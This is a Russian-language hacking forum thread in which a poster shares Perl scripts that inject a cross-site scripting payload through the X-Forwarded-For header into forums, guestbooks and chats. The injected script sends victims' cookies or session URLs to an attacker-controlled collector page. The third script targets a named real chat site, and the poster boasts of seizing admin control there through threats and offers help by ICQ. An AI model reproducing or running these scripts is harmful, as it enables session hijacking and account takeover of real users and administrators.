В помощь взлому...

Кароче вот написал себе снифер...
Главная работа заключается в том если форум,гостевая,чат получает айпи через прокси (X_FORVARED_FOR) при отсылке нашего сообщения или ника, получаем КУКИ журтвы или Его сэссию


1-версия получаем куки
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛНИКА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМОМУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags('font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮБОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;

[/QUOTE]<span id='postcolor'>
2 верси, получаем сэссии админов

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">

#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="ХОСТ_СЕРВЕРА";
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send (SOCK, "GET СЮДА_ВСТАВЛЯЕМ_ВХОД_НАЕШЛНИКА_ПОЛНЫЙ_ПУТЬ_ИЛИ_ОТСЫЛКУ САМОГО_СООБЩЕНИЯ HTTP/1.0\nREFERER: СЮДА ВСТАВЛЯЕМ_ПУТЬ_К_ИСПОЛНЯЕМОМУ_СКРИПТУ(например_http://forum.antichat.ru/cgi-bin/ikonboard.cgi\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+location.href+'\")';document.all.tags('font')[0].style.backgroundImage=a;</script> СЮДА_НАШ_ПРОКСИ_ИП(МОЖНО_ЛЮБОЙ,он будит виден админам...можно типа(АДМИНЫ_КОЗЛЫ)\nHost: http://$host\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;

[/QUOTE]<span id='postcolor'>

Как заметно в первой версии получаем через document.cookie
во второй через location.href

http://seechat.fatal.ru/frik/good.php? - этот скрипт обрабатывает отсылку первого скрипта... если так и войти на неё то в броузере ничего не покажется а ваш ИП попадёт в него!!!
Просматреть его можно по ссылке
http://seechat.fatal.ru/frik/good.php?pass=123321

 

Скрипт рабочий, тэстировался на многих чатах и форумах!!! РАБОТАЕТ!

 

Объясни пожалуйста по-подробней как пользоваться, желатель с примером

 

вообщемт вот я ломал чат www.chat.f-1.ru
я там стал главным админом... но разными *** угрозами, а попалился я там конкретно пришлось его покинуть, но дыры эти так же и остались... смысл таког (для чата) если сидит админ в чате то (если чесно то непомню через куки или через локатионс он работает проверь и так и так...
если через локатион то проблем нет получай на http://seechat.fatal.ru/good.php?pass=123321 локатионс жертвы и творишь что хочешь!!! аналогично и другим чатам... в форумаххх и гостевых всё попроще
если конечно тот чат через куки а как такого он помоему и через куки и работает то ты получишь на сеечате КУКИсы админов... ну а дальше уже работа идёт с кукисами используй приведённые здесь программы... из статьи че гевары... но не знаею работает ли она или нет пробовать ещё не удавалось...с подменой куков... я пользуюсь своим методом... он немного по тяжелей но это не проблема... вот собственно построенный файл получения админов кук из того чата, если как такого они там находятса...

</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE">
#!/usr/bin/perl
print "Content-type: text/html\n\n";
use Socket;
$host="www.chat.f-1.ru;
$port="80";
socket(SOCK, PF_INET, SOCK_STREAM, getprotobyname('tcp'));
$iaddr = inet_aton($host);
$paddr = sockaddr_in($port, $iaddr);
connect(SOCK, $paddr);
send(SOCK, "GET http://www.chat.f-1.ru/cgi/chat.pl?cf=login&amp;mode=reg&amp;username=testPRG HTTP/1.1\nREFERER: http://www.chat.f-1.ru/cgi/chat.pl\nX_FORWARDED_FOR: <script>a='url(\"http://seechat.fatal.ru/frik/good.php?'+document.cookie+'\")';document.all.tags('font')[0].style.backgroundImage=a;</script> 0.0.0.0\nHost: http://www.chat.f-1.ru\n\n", 0);
print "\n";
print "Status:\n";
print <SOCK>;
close(SOCK);
print("$i\n");
<>;
[/QUOTE]<span id='postcolor'>

ТОесть юзай что не получитса пиши в асю... хотя фсё должно работать!!!


<span style='color:GREEN'>MY ICQ 404035</span>